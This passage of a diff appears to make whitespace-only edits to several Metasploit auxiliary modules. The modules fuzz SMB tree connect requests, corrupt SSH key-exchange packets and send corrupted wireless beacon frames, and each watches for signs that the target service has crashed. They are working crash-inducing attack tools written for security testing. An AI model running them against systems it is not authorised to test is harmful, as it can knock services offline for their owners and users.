n.l4.fix!(n.l3.src_ip, n.l3.dst_ip, '')
|
||||
|
||||
pkt = n.pack
|
||||
|
||||
capture_sendto(pkt, rhost)
|
||||
|
@ -16,7 +16,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
|
||||
include Msf::Exploit::Remote::SMB
|
||||
include Msf::Auxiliary::Fuzzer
|
||||
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'SMB Tree Connect Request Fuzzer',
|
||||
@ -29,35 +29,35 @@ class Metasploit3 < Msf::Auxiliary
|
||||
'Version' => '$Revision$'
|
||||
))
|
||||
end
|
||||
|
||||
|
||||
def do_smb_connect(pkt,opts={})
|
||||
@connected = false
|
||||
connect
|
||||
simple.login(
|
||||
datastore['SMBName'],
|
||||
datastore['SMBName'],
|
||||
datastore['SMBUser'],
|
||||
datastore['SMBPass'],
|
||||
datastore['SMBDomain']
|
||||
)
|
||||
|
||||
)
|
||||
|
||||
@connected = true
|
||||
simple.connect("\\\\#{datastore['RHOST']}\\#{pkt}")
|
||||
end
|
||||
|
||||
|
||||
def run
|
||||
last_str = nil
|
||||
last_inp = nil
|
||||
last_err = nil
|
||||
|
||||
|
||||
cnt = 0
|
||||
|
||||
fuzz_strings do |str|
|
||||
cnt += 1
|
||||
|
||||
|
||||
if(cnt % 100 == 0)
|
||||
print_status("Fuzzing with iteration #{cnt} using #{@last_fuzzer_input}")
|
||||
end
|
||||
|
||||
|
||||
begin
|
||||
do_smb_connect(str, 0.25)
|
||||
rescue ::Interrupt
|
||||
@ -68,16 +68,16 @@ class Metasploit3 < Msf::Auxiliary
|
||||
ensure
|
||||
disconnect
|
||||
end
|
||||
|
||||
|
||||
if(not @connected)
|
||||
if(last_str)
|
||||
print_status("The service may have crashed: iteration:#{cnt-1} method=#{last_inp} string=#{last_str.unpack("H*")[0]} error=#{last_err}")
|
||||
else
|
||||
print_status("Could not connect to the service: #{last_err}")
|
||||
print_status("Could not connect to the service: #{last_err}")
|
||||
end
|
||||
return
|
||||
end
|
||||
|
||||
|
||||
last_str = str
|
||||
last_inp = @last_fuzzer_input
|
||||
end
|
||||
|
@ -16,7 +16,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
|
||||
include Msf::Exploit::Remote::SMB
|
||||
include Msf::Auxiliary::Fuzzer
|
||||
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'SMB Tree Connect Request Corruption',
|
||||
@ -32,48 +32,48 @@ class Metasploit3 < Msf::Auxiliary
|
||||
OptString.new('SMBTREE', [true, 'Specify the tree name to corrupt', "\\\\SERVER\\IPC$"])
|
||||
], self.class)
|
||||
end
|
||||
|
||||
|
||||
def do_smb_tree(pkt,opts={})
|
||||
@connected = false
|
||||
connect
|
||||
simple.login(
|
||||
datastore['SMBName'],
|
||||
datastore['SMBName'],
|
||||
datastore['SMBUser'],
|
||||
datastore['SMBPass'],
|
||||
datastore['SMBDomain']
|
||||
)
|
||||
|
||||
|
||||
@connected = true
|
||||
sock.put(pkt)
|
||||
sock.get_once(-1, opts[:timeout])
|
||||
end
|
||||
|
||||
|
||||
def run
|
||||
|
||||
|
||||
# Connect in order to get the server-assigned user-id
|
||||
connect
|
||||
smb_login
|
||||
pkt = make_smb_tree
|
||||
disconnect
|
||||
|
||||
|
||||
last_str = nil
|
||||
last_inp = nil
|
||||
last_err = nil
|
||||
|
||||
|
||||
cnt = 0
|
||||
|
||||
|
||||
max = datastore['MAXDEPTH'].to_i
|
||||
max = nil if max == 0
|
||||
tot = ( max ? [max,pkt.length].min : pkt.length) * 256
|
||||
|
||||
|
||||
print_status("Fuzzing SMB tree connect with #{tot} requests")
|
||||
fuzz_string_corrupt_byte_reverse(pkt,max) do |str|
|
||||
cnt += 1
|
||||
|
||||
|
||||
if(cnt % 100 == 0)
|
||||
print_status("Fuzzing with iteration #{cnt}/#{tot} using #{@last_fuzzer_input}")
|
||||
end
|
||||
|
||||
|
||||
begin
|
||||
r = do_smb_tree(str, 0.25)
|
||||
rescue ::Interrupt
|
||||
@ -84,29 +84,29 @@ class Metasploit3 < Msf::Auxiliary
|
||||
ensure
|
||||
disconnect
|
||||
end
|
||||
|
||||
|
||||
if(not @connected)
|
||||
if(last_str)
|
||||
print_status("The service may have crashed: iteration:#{cnt-1} method=#{last_inp} string=#{last_str.unpack("H*")[0]} error=#{last_err}")
|
||||
else
|
||||
print_status("Could not connect to the service: #{last_err}")
|
||||
print_status("Could not connect to the service: #{last_err}")
|
||||
end
|
||||
return
|
||||
end
|
||||
|
||||
|
||||
last_str = str
|
||||
last_inp = @last_fuzzer_input
|
||||
end
|
||||
end
|
||||
|
||||
|
||||
def make_smb_tree
|
||||
share = datastore['SMBTREE']
|
||||
pass = ''
|
||||
data = [ pass, share, '?????' ].collect{ |a| a + "\x00" }.join('');
|
||||
|
||||
|
||||
pkt = Rex::Proto::SMB::Constants::SMB_TREE_CONN_PKT.make_struct
|
||||
simple.client.smb_defaults(pkt['Payload']['SMB'])
|
||||
|
||||
|
||||
pkt['Payload']['SMB'].v['Command'] = Rex::Proto::SMB::Constants::SMB_COM_TREE_CONNECT_ANDX
|
||||
pkt['Payload']['SMB'].v['Flags1'] = 0x18
|
||||
pkt['Payload']['SMB'].v['Flags2'] = 0x2001
|
||||
|
@ -16,7 +16,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
|
||||
include Msf::Exploit::Remote::Tcp
|
||||
include Msf::Auxiliary::Fuzzer
|
||||
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'SSH Key Exchange Init Corruption',
|
||||
@ -32,40 +32,40 @@ class Metasploit3 < Msf::Auxiliary
|
||||
OptInt.new('MAXDEPTH', [false, 'Specify a maximum byte depth to test'])
|
||||
], self.class)
|
||||
end
|
||||
|
||||
|
||||
def do_ssh_kexinit(pkt,opts={})
|
||||
@connected = false
|
||||
connect
|
||||
@connected = true
|
||||
|
||||
|
||||
@banner = sock.get_once(-1,opts[:banner_timeout])
|
||||
return if not @banner
|
||||
|
||||
|
||||
sock.put("SSH-2.0-OpenSSH_5.1p1 Debian-5ubuntu1\r\n")
|
||||
sock.put(pkt)
|
||||
sock.get_once(-1,opts[:kex_timeout])
|
||||
end
|
||||
|
||||
|
||||
def run
|
||||
last_str = nil
|
||||
last_inp = nil
|
||||
last_err = nil
|
||||
|
||||
|
||||
pkt = make_kex_init
|
||||
cnt = 0
|
||||
|
||||
|
||||
max = datastore['MAXDEPTH'].to_i
|
||||
max = nil if max == 0
|
||||
tot = ( max ? [max,pkt.length].min : pkt.length) * 256
|
||||
|
||||
|
||||
print_status("Fuzzing SSH initial key exchange with #{tot} requests")
|
||||
fuzz_string_corrupt_byte_reverse(pkt,max) do |str|
|
||||
cnt += 1
|
||||
|
||||
|
||||
if(cnt % 100 == 0)
|
||||
print_status("Fuzzing with iteration #{cnt}/#{tot} using #{@last_fuzzer_input}")
|
||||
end
|
||||
|
||||
|
||||
begin
|
||||
r = do_ssh_kexinit(str,:banner_timeout => 5, :kex_timeout => 0.5)
|
||||
rescue ::Interrupt
|
||||
@ -76,16 +76,16 @@ class Metasploit3 < Msf::Auxiliary
|
||||
ensure
|
||||
disconnect
|
||||
end
|
||||
|
||||
|
||||
if(not @connected)
|
||||
if(last_str)
|
||||
print_status("The service may have crashed: iteration:#{cnt-1} method=#{last_inp} string=#{last_str.unpack("H*")[0]} error=#{last_err}")
|
||||
else
|
||||
print_status("Could not connect to the service: #{last_err}")
|
||||
print_status("Could not connect to the service: #{last_err}")
|
||||
end
|
||||
return
|
||||
end
|
||||
|
||||
|
||||
if(not @banner)
|
||||
print_status("The service may have crashed (no banner): iteration:#{cnt-1} method=#{last_inp} string=#{last_str.unpack("H*")[0]} ")
|
||||
return
|
||||
@ -95,106 +95,106 @@ class Metasploit3 < Msf::Auxiliary
|
||||
last_inp = @last_fuzzer_input
|
||||
end
|
||||
end
|
||||
|
||||
|
||||
def make_kex_init
|
||||
[0x00, 0x00, 0x03, 0x14, 0x08, 0x14, 0xff, 0x9f,
|
||||
0xde, 0x5d, 0x5f, 0xb3, 0x07, 0x8f, 0x49, 0xa7,
|
||||
0x79, 0x6a, 0x03, 0x3d, 0xaf, 0x55, 0x00, 0x00,
|
||||
0x00, 0x7e, 0x64, 0x69, 0x66, 0x66, 0x69, 0x65,
|
||||
0x2d, 0x68, 0x65, 0x6c, 0x6c, 0x6d, 0x61, 0x6e,
|
||||
0x2d, 0x67, 0x72, 0x6f, 0x75, 0x70, 0x2d, 0x65,
|
||||
0x78, 0x63, 0x68, 0x61, 0x6e, 0x67, 0x65, 0x2d,
|
||||
0x73, 0x68, 0x61, 0x32, 0x35, 0x36, 0x2c, 0x64,
|
||||
0x69, 0x66, 0x66, 0x69, 0x65, 0x2d, 0x68, 0x65,
|
||||
0x6c, 0x6c, 0x6d, 0x61, 0x6e, 0x2d, 0x67, 0x72,
|
||||
0x6f, 0x75, 0x70, 0x2d, 0x65, 0x78, 0x63, 0x68,
|
||||
0x61, 0x6e, 0x67, 0x65, 0x2d, 0x73, 0x68, 0x61,
|
||||
0x31, 0x2c, 0x64, 0x69, 0x66, 0x66, 0x69, 0x65,
|
||||
0x2d, 0x68, 0x65, 0x6c, 0x6c, 0x6d, 0x61, 0x6e,
|
||||
0x2d, 0x67, 0x72, 0x6f, 0x75, 0x70, 0x31, 0x34,
|
||||
0x2d, 0x73, 0x68, 0x61, 0x31, 0x2c, 0x64, 0x69,
|
||||
0x66, 0x66, 0x69, 0x65, 0x2d, 0x68, 0x65, 0x6c,
|
||||
0x6c, 0x6d, 0x61, 0x6e, 0x2d, 0x67, 0x72, 0x6f,
|
||||
0x75, 0x70, 0x31, 0x2d, 0x73, 0x68, 0x61, 0x31,
|
||||
0x00, 0x00, 0x00, 0x0f, 0x73, 0x73, 0x68, 0x2d,
|
||||
0x72, 0x73, 0x61, 0x2c, 0x73, 0x73, 0x68, 0x2d,
|
||||
0x64, 0x73, 0x73, 0x00, 0x00, 0x00, 0x9d, 0x61,
|
||||
0x65, 0x73, 0x31, 0x32, 0x38, 0x2d, 0x63, 0x62,
|
||||
0x63, 0x2c, 0x33, 0x64, 0x65, 0x73, 0x2d, 0x63,
|
||||
0x62, 0x63, 0x2c, 0x62, 0x6c, 0x6f, 0x77, 0x66,
|
||||
0x69, 0x73, 0x68, 0x2d, 0x63, 0x62, 0x63, 0x2c,
|
||||
0x63, 0x61, 0x73, 0x74, 0x31, 0x32, 0x38, 0x2d,
|
||||
0x63, 0x62, 0x63, 0x2c, 0x61, 0x72, 0x63, 0x66,
|
||||
0x6f, 0x75, 0x72, 0x31, 0x32, 0x38, 0x2c, 0x61,
|
||||
0x72, 0x63, 0x66, 0x6f, 0x75, 0x72, 0x32, 0x35,
|
||||
0x36, 0x2c, 0x61, 0x72, 0x63, 0x66, 0x6f, 0x75,
|
||||
0x72, 0x2c, 0x61, 0x65, 0x73, 0x31, 0x39, 0x32,
|
||||
0x2d, 0x63, 0x62, 0x63, 0x2c, 0x61, 0x65, 0x73,
|
||||
0x32, 0x35, 0x36, 0x2d, 0x63, 0x62, 0x63, 0x2c,
|
||||
0x72, 0x69, 0x6a, 0x6e, 0x64, 0x61, 0x65, 0x6c,
|
||||
0x2d, 0x63, 0x62, 0x63, 0x40, 0x6c, 0x79, 0x73,
|
||||
0x61, 0x74, 0x6f, 0x72, 0x2e, 0x6c, 0x69, 0x75,
|
||||
0x2e, 0x73, 0x65, 0x2c, 0x61, 0x65, 0x73, 0x31,
|
||||
0x32, 0x38, 0x2d, 0x63, 0x74, 0x72, 0x2c, 0x61,
|
||||
0x65, 0x73, 0x31, 0x39, 0x32, 0x2d, 0x63, 0x74,
|
||||
0x72, 0x2c, 0x61, 0x65, 0x73, 0x32, 0x35, 0x36,
|
||||
0x2d, 0x63, 0x74, 0x72, 0x00, 0x00, 0x00, 0x9d,
|
||||
0x61, 0x65, 0x73, 0x31, 0x32, 0x38, 0x2d, 0x63,
|
||||
0x62, 0x63, 0x2c, 0x33, 0x64, 0x65, 0x73, 0x2d,
|
||||
0x63, 0x62, 0x63, 0x2c, 0x62, 0x6c, 0x6f, 0x77,
|
||||
0x66, 0x69, 0x73, 0x68, 0x2d, 0x63, 0x62, 0x63,
|
||||
0x2c, 0x63, 0x61, 0x73, 0x74, 0x31, 0x32, 0x38,
|
||||
0x2d, 0x63, 0x62, 0x63, 0x2c, 0x61, 0x72, 0x63,
|
||||
0x66, 0x6f, 0x75, 0x72, 0x31, 0x32, 0x38, 0x2c,
|
||||
0x61, 0x72, 0x63, 0x66, 0x6f, 0x75, 0x72, 0x32,
|
||||
0x35, 0x36, 0x2c, 0x61, 0x72, 0x63, 0x66, 0x6f,
|
||||
0x75, 0x72, 0x2c, 0x61, 0x65, 0x73, 0x31, 0x39,
|
||||
0x32, 0x2d, 0x63, 0x62, 0x63, 0x2c, 0x61, 0x65,
|
||||
0x73, 0x32, 0x35, 0x36, 0x2d, 0x63, 0x62, 0x63,
|
||||
0x2c, 0x72, 0x69, 0x6a, 0x6e, 0x64, 0x61, 0x65,
|
||||
0x6c, 0x2d, 0x63, 0x62, 0x63, 0x40, 0x6c, 0x79,
|
||||
0x73, 0x61, 0x74, 0x6f, 0x72, 0x2e, 0x6c, 0x69,
|
||||
0x75, 0x2e, 0x73, 0x65, 0x2c, 0x61, 0x65, 0x73,
|
||||
0x31, 0x32, 0x38, 0x2d, 0x63, 0x74, 0x72, 0x2c,
|
||||
0x61, 0x65, 0x73, 0x31, 0x39, 0x32, 0x2d, 0x63,
|
||||
0x74, 0x72, 0x2c, 0x61, 0x65, 0x73, 0x32, 0x35,
|
||||
0x36, 0x2d, 0x63, 0x74, 0x72, 0x00, 0x00, 0x00,
|
||||
0x69, 0x68, 0x6d, 0x61, 0x63, 0x2d, 0x6d, 0x64,
|
||||
0x35, 0x2c, 0x68, 0x6d, 0x61, 0x63, 0x2d, 0x73,
|
||||
0x68, 0x61, 0x31, 0x2c, 0x75, 0x6d, 0x61, 0x63,
|
||||
0x2d, 0x36, 0x34, 0x40, 0x6f, 0x70, 0x65, 0x6e,
|
||||
0x73, 0x73, 0x68, 0x2e, 0x63, 0x6f, 0x6d, 0x2c,
|
||||
0x68, 0x6d, 0x61, 0x63, 0x2d, 0x72, 0x69, 0x70,
|
||||
0x65, 0x6d, 0x64, 0x31, 0x36, 0x30, 0x2c, 0x68,
|
||||
0x6d, 0x61, 0x63, 0x2d, 0x72, 0x69, 0x70, 0x65,
|
||||
0x6d, 0x64, 0x31, 0x36, 0x30, 0x40, 0x6f, 0x70,
|
||||
0x65, 0x6e, 0x73, 0x73, 0x68, 0x2e, 0x63, 0x6f,
|
||||
0x6d, 0x2c, 0x68, 0x6d, 0x61, 0x63, 0x2d, 0x73,
|
||||
0x68, 0x61, 0x31, 0x2d, 0x39, 0x36, 0x2c, 0x68,
|
||||
0x6d, 0x61, 0x63, 0x2d, 0x6d, 0x64, 0x35, 0x2d,
|
||||
0x39, 0x36, 0x00, 0x00, 0x00, 0x69, 0x68, 0x6d,
|
||||
0x61, 0x63, 0x2d, 0x6d, 0x64, 0x35, 0x2c, 0x68,
|
||||
0x6d, 0x61, 0x63, 0x2d, 0x73, 0x68, 0x61, 0x31,
|
||||
0x2c, 0x75, 0x6d, 0x61, 0x63, 0x2d, 0x36, 0x34,
|
||||
0x40, 0x6f, 0x70, 0x65, 0x6e, 0x73, 0x73, 0x68,
|
||||
0x2e, 0x63, 0x6f, 0x6d, 0x2c, 0x68, 0x6d, 0x61,
|
||||
0x63, 0x2d, 0x72, 0x69, 0x70, 0x65, 0x6d, 0x64,
|
||||
0x31, 0x36, 0x30, 0x2c, 0x68, 0x6d, 0x61, 0x63,
|
||||
0x2d, 0x72, 0x69, 0x70, 0x65, 0x6d, 0x64, 0x31,
|
||||
0x36, 0x30, 0x40, 0x6f, 0x70, 0x65, 0x6e, 0x73,
|
||||
0x73, 0x68, 0x2e, 0x63, 0x6f, 0x6d, 0x2c, 0x68,
|
||||
0x6d, 0x61, 0x63, 0x2d, 0x73, 0x68, 0x61, 0x31,
|
||||
0x2d, 0x39, 0x36, 0x2c, 0x68, 0x6d, 0x61, 0x63,
|
||||
0x2d, 0x6d, 0x64, 0x35, 0x2d, 0x39, 0x36, 0x00,
|
||||
0x00, 0x00, 0x1a, 0x7a, 0x6c, 0x69, 0x62, 0x40,
|
||||
0x6f, 0x70, 0x65, 0x6e, 0x73, 0x73, 0x68, 0x2e,
|
||||
0x63, 0x6f, 0x6d, 0x2c, 0x7a, 0x6c, 0x69, 0x62,
|
||||
0x2c, 0x6e, 0x6f, 0x6e, 0x65, 0x00, 0x00, 0x00,
|
||||
0x1a, 0x7a, 0x6c, 0x69, 0x62, 0x40, 0x6f, 0x70,
|
||||
0x65, 0x6e, 0x73, 0x73, 0x68, 0x2e, 0x63, 0x6f,
|
||||
0x6d, 0x2c, 0x7a, 0x6c, 0x69, 0x62, 0x2c, 0x6e,
|
||||
0x6f, 0x6e, 0x65, 0x00, 0x00, 0x00, 0x00, 0x00,
|
||||
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
|
||||
[0x00, 0x00, 0x03, 0x14, 0x08, 0x14, 0xff, 0x9f,
|
||||
0xde, 0x5d, 0x5f, 0xb3, 0x07, 0x8f, 0x49, 0xa7,
|
||||
0x79, 0x6a, 0x03, 0x3d, 0xaf, 0x55, 0x00, 0x00,
|
||||
0x00, 0x7e, 0x64, 0x69, 0x66, 0x66, 0x69, 0x65,
|
||||
0x2d, 0x68, 0x65, 0x6c, 0x6c, 0x6d, 0x61, 0x6e,
|
||||
0x2d, 0x67, 0x72, 0x6f, 0x75, 0x70, 0x2d, 0x65,
|
||||
0x78, 0x63, 0x68, 0x61, 0x6e, 0x67, 0x65, 0x2d,
|
||||
0x73, 0x68, 0x61, 0x32, 0x35, 0x36, 0x2c, 0x64,
|
||||
0x69, 0x66, 0x66, 0x69, 0x65, 0x2d, 0x68, 0x65,
|
||||
0x6c, 0x6c, 0x6d, 0x61, 0x6e, 0x2d, 0x67, 0x72,
|
||||
0x6f, 0x75, 0x70, 0x2d, 0x65, 0x78, 0x63, 0x68,
|
||||
0x61, 0x6e, 0x67, 0x65, 0x2d, 0x73, 0x68, 0x61,
|
||||
0x31, 0x2c, 0x64, 0x69, 0x66, 0x66, 0x69, 0x65,
|
||||
0x2d, 0x68, 0x65, 0x6c, 0x6c, 0x6d, 0x61, 0x6e,
|
||||
0x2d, 0x67, 0x72, 0x6f, 0x75, 0x70, 0x31, 0x34,
|
||||
0x2d, 0x73, 0x68, 0x61, 0x31, 0x2c, 0x64, 0x69,
|
||||
0x66, 0x66, 0x69, 0x65, 0x2d, 0x68, 0x65, 0x6c,
|
||||
0x6c, 0x6d, 0x61, 0x6e, 0x2d, 0x67, 0x72, 0x6f,
|
||||
0x75, 0x70, 0x31, 0x2d, 0x73, 0x68, 0x61, 0x31,
|
||||
0x00, 0x00, 0x00, 0x0f, 0x73, 0x73, 0x68, 0x2d,
|
||||
0x72, 0x73, 0x61, 0x2c, 0x73, 0x73, 0x68, 0x2d,
|
||||
0x64, 0x73, 0x73, 0x00, 0x00, 0x00, 0x9d, 0x61,
|
||||
0x65, 0x73, 0x31, 0x32, 0x38, 0x2d, 0x63, 0x62,
|
||||
0x63, 0x2c, 0x33, 0x64, 0x65, 0x73, 0x2d, 0x63,
|
||||
0x62, 0x63, 0x2c, 0x62, 0x6c, 0x6f, 0x77, 0x66,
|
||||
0x69, 0x73, 0x68, 0x2d, 0x63, 0x62, 0x63, 0x2c,
|
||||
0x63, 0x61, 0x73, 0x74, 0x31, 0x32, 0x38, 0x2d,
|
||||
0x63, 0x62, 0x63, 0x2c, 0x61, 0x72, 0x63, 0x66,
|
||||
0x6f, 0x75, 0x72, 0x31, 0x32, 0x38, 0x2c, 0x61,
|
||||
0x72, 0x63, 0x66, 0x6f, 0x75, 0x72, 0x32, 0x35,
|
||||
0x36, 0x2c, 0x61, 0x72, 0x63, 0x66, 0x6f, 0x75,
|
||||
0x72, 0x2c, 0x61, 0x65, 0x73, 0x31, 0x39, 0x32,
|
||||
0x2d, 0x63, 0x62, 0x63, 0x2c, 0x61, 0x65, 0x73,
|
||||
0x32, 0x35, 0x36, 0x2d, 0x63, 0x62, 0x63, 0x2c,
|
||||
0x72, 0x69, 0x6a, 0x6e, 0x64, 0x61, 0x65, 0x6c,
|
||||
0x2d, 0x63, 0x62, 0x63, 0x40, 0x6c, 0x79, 0x73,
|
||||
0x61, 0x74, 0x6f, 0x72, 0x2e, 0x6c, 0x69, 0x75,
|
||||
0x2e, 0x73, 0x65, 0x2c, 0x61, 0x65, 0x73, 0x31,
|
||||
0x32, 0x38, 0x2d, 0x63, 0x74, 0x72, 0x2c, 0x61,
|
||||
0x65, 0x73, 0x31, 0x39, 0x32, 0x2d, 0x63, 0x74,
|
||||
0x72, 0x2c, 0x61, 0x65, 0x73, 0x32, 0x35, 0x36,
|
||||
0x2d, 0x63, 0x74, 0x72, 0x00, 0x00, 0x00, 0x9d,
|
||||
0x61, 0x65, 0x73, 0x31, 0x32, 0x38, 0x2d, 0x63,
|
||||
0x62, 0x63, 0x2c, 0x33, 0x64, 0x65, 0x73, 0x2d,
|
||||
0x63, 0x62, 0x63, 0x2c, 0x62, 0x6c, 0x6f, 0x77,
|
||||
0x66, 0x69, 0x73, 0x68, 0x2d, 0x63, 0x62, 0x63,
|
||||
0x2c, 0x63, 0x61, 0x73, 0x74, 0x31, 0x32, 0x38,
|
||||
0x2d, 0x63, 0x62, 0x63, 0x2c, 0x61, 0x72, 0x63,
|
||||
0x66, 0x6f, 0x75, 0x72, 0x31, 0x32, 0x38, 0x2c,
|
||||
0x61, 0x72, 0x63, 0x66, 0x6f, 0x75, 0x72, 0x32,
|
||||
0x35, 0x36, 0x2c, 0x61, 0x72, 0x63, 0x66, 0x6f,
|
||||
0x75, 0x72, 0x2c, 0x61, 0x65, 0x73, 0x31, 0x39,
|
||||
0x32, 0x2d, 0x63, 0x62, 0x63, 0x2c, 0x61, 0x65,
|
||||
0x73, 0x32, 0x35, 0x36, 0x2d, 0x63, 0x62, 0x63,
|
||||
0x2c, 0x72, 0x69, 0x6a, 0x6e, 0x64, 0x61, 0x65,
|
||||
0x6c, 0x2d, 0x63, 0x62, 0x63, 0x40, 0x6c, 0x79,
|
||||
0x73, 0x61, 0x74, 0x6f, 0x72, 0x2e, 0x6c, 0x69,
|
||||
0x75, 0x2e, 0x73, 0x65, 0x2c, 0x61, 0x65, 0x73,
|
||||
0x31, 0x32, 0x38, 0x2d, 0x63, 0x74, 0x72, 0x2c,
|
||||
0x61, 0x65, 0x73, 0x31, 0x39, 0x32, 0x2d, 0x63,
|
||||
0x74, 0x72, 0x2c, 0x61, 0x65, 0x73, 0x32, 0x35,
|
||||
0x36, 0x2d, 0x63, 0x74, 0x72, 0x00, 0x00, 0x00,
|
||||
0x69, 0x68, 0x6d, 0x61, 0x63, 0x2d, 0x6d, 0x64,
|
||||
0x35, 0x2c, 0x68, 0x6d, 0x61, 0x63, 0x2d, 0x73,
|
||||
0x68, 0x61, 0x31, 0x2c, 0x75, 0x6d, 0x61, 0x63,
|
||||
0x2d, 0x36, 0x34, 0x40, 0x6f, 0x70, 0x65, 0x6e,
|
||||
0x73, 0x73, 0x68, 0x2e, 0x63, 0x6f, 0x6d, 0x2c,
|
||||
0x68, 0x6d, 0x61, 0x63, 0x2d, 0x72, 0x69, 0x70,
|
||||
0x65, 0x6d, 0x64, 0x31, 0x36, 0x30, 0x2c, 0x68,
|
||||
0x6d, 0x61, 0x63, 0x2d, 0x72, 0x69, 0x70, 0x65,
|
||||
0x6d, 0x64, 0x31, 0x36, 0x30, 0x40, 0x6f, 0x70,
|
||||
0x65, 0x6e, 0x73, 0x73, 0x68, 0x2e, 0x63, 0x6f,
|
||||
0x6d, 0x2c, 0x68, 0x6d, 0x61, 0x63, 0x2d, 0x73,
|
||||
0x68, 0x61, 0x31, 0x2d, 0x39, 0x36, 0x2c, 0x68,
|
||||
0x6d, 0x61, 0x63, 0x2d, 0x6d, 0x64, 0x35, 0x2d,
|
||||
0x39, 0x36, 0x00, 0x00, 0x00, 0x69, 0x68, 0x6d,
|
||||
0x61, 0x63, 0x2d, 0x6d, 0x64, 0x35, 0x2c, 0x68,
|
||||
0x6d, 0x61, 0x63, 0x2d, 0x73, 0x68, 0x61, 0x31,
|
||||
0x2c, 0x75, 0x6d, 0x61, 0x63, 0x2d, 0x36, 0x34,
|
||||
0x40, 0x6f, 0x70, 0x65, 0x6e, 0x73, 0x73, 0x68,
|
||||
0x2e, 0x63, 0x6f, 0x6d, 0x2c, 0x68, 0x6d, 0x61,
|
||||
0x63, 0x2d, 0x72, 0x69, 0x70, 0x65, 0x6d, 0x64,
|
||||
0x31, 0x36, 0x30, 0x2c, 0x68, 0x6d, 0x61, 0x63,
|
||||
0x2d, 0x72, 0x69, 0x70, 0x65, 0x6d, 0x64, 0x31,
|
||||
0x36, 0x30, 0x40, 0x6f, 0x70, 0x65, 0x6e, 0x73,
|
||||
0x73, 0x68, 0x2e, 0x63, 0x6f, 0x6d, 0x2c, 0x68,
|
||||
0x6d, 0x61, 0x63, 0x2d, 0x73, 0x68, 0x61, 0x31,
|
||||
0x2d, 0x39, 0x36, 0x2c, 0x68, 0x6d, 0x61, 0x63,
|
||||
0x2d, 0x6d, 0x64, 0x35, 0x2d, 0x39, 0x36, 0x00,
|
||||
0x00, 0x00, 0x1a, 0x7a, 0x6c, 0x69, 0x62, 0x40,
|
||||
0x6f, 0x70, 0x65, 0x6e, 0x73, 0x73, 0x68, 0x2e,
|
||||
0x63, 0x6f, 0x6d, 0x2c, 0x7a, 0x6c, 0x69, 0x62,
|
||||
0x2c, 0x6e, 0x6f, 0x6e, 0x65, 0x00, 0x00, 0x00,
|
||||
0x1a, 0x7a, 0x6c, 0x69, 0x62, 0x40, 0x6f, 0x70,
|
||||
0x65, 0x6e, 0x73, 0x73, 0x68, 0x2e, 0x63, 0x6f,
|
||||
0x6d, 0x2c, 0x7a, 0x6c, 0x69, 0x62, 0x2c, 0x6e,
|
||||
0x6f, 0x6e, 0x65, 0x00, 0x00, 0x00, 0x00, 0x00,
|
||||
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
|
||||
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00].pack("C*")
|
||||
end
|
||||
end
|
||||
|
@ -3,7 +3,7 @@
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/framework/
|
||||
@ -19,12 +19,12 @@ class Metasploit3 < Msf::Auxiliary
|
||||
include Msf::Auxiliary::Dos
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
super(update_info(info,
|
||||
'Name' => 'Wireless Beacon Frame Fuzzer',
|
||||
'Description' => %q{
|
||||
This module sends out corrupted beacon frames.
|
||||
},
|
||||
|
||||
|
||||
'Author' => [ 'hdm' ],
|
||||
'License' => MSF_LICENSE,
|
||||
'Version' => '$Revision$'
|
||||
@ -33,7 +33,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
[
|
||||
OptString.new('ADDR_DST', [ true, "The MAC address of the target system",'FF:FF:FF:FF:FF:FF']),
|
||||
OptString.new('PING_HOST', [ false, "Ping the wired address of the target host"])
|
||||
], self.class)
|
||||
], self.class)
|
||||
end
|
||||
|
||||
def ping_check
|
||||
@ -46,24 +46,24 @@ class Metasploit3 < Msf::Auxiliary
|
||||
end
|
||||
return false
|
||||
end
|
||||
|
||||
|
||||
def run
|
||||
|
||||
|
||||
srand(0)
|
||||
|
||||
|
||||
@@uni = 0
|
||||
|
||||
|
||||
frames = []
|
||||
|
||||
|
||||
open_wifi
|
||||
|
||||
|
||||
print_status("Sending corrupt frames...")
|
||||
|
||||
|
||||
while (true)
|
||||
frame = create_frame()
|
||||
|
||||
|
||||
if (datastore['PING_HOST'])
|
||||
|
||||
|
||||
if (frames.length >= 5)
|
||||
frames.shift
|
||||
frames.push(frame)
|
||||
@ -71,7 +71,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
frames.push(frame)
|
||||
end
|
||||
|
||||
1.upto(3) do
|
||||
1.upto(3) do
|
||||
wifi.write(frame)
|
||||
if (not ping_check())
|
||||
frames.each do |f|
|
||||
@ -79,9 +79,9 @@ class Metasploit3 < Msf::Auxiliary
|
||||
print_status f.inspect
|
||||
end
|
||||
return
|
||||
end
|
||||
end
|
||||
end
|
||||
else
|
||||
else
|
||||
wifi.write(frame)
|
||||
end
|
||||
end
|
||||
@ -95,20 +95,20 @@ class Metasploit3 < Msf::Auxiliary
|
||||
ssid = Rex::Text.rand_text_alphanumeric(rand(256))
|
||||
bssid = Rex::Text.rand_text(6)
|
||||
seq = [rand(255)].pack('n')
|
||||
|
||||
|
||||
frame =
|
||||
"\x80" + # type/subtype
|
||||
"\x00" + # flags
|
||||
"\x00\x00" + # duration
|
||||
"\x00\x00" + # duration
|
||||
"\xff\xff\xff\xff\xff\xff" + # dst
|
||||
bssid + # src
|
||||
bssid + # bssid
|
||||
seq + # seq
|
||||
seq + # seq
|
||||
Rex::Text.rand_text(8) + # timestamp value
|
||||
"\x64\x00" + # beacon interval
|
||||
#"\x00\x05" + # capability flags
|
||||
Rex::Text.rand_text(2) +
|
||||
|
||||
Rex::Text.rand_text(2) +
|
||||
|
||||
# ssid tag
|
||||
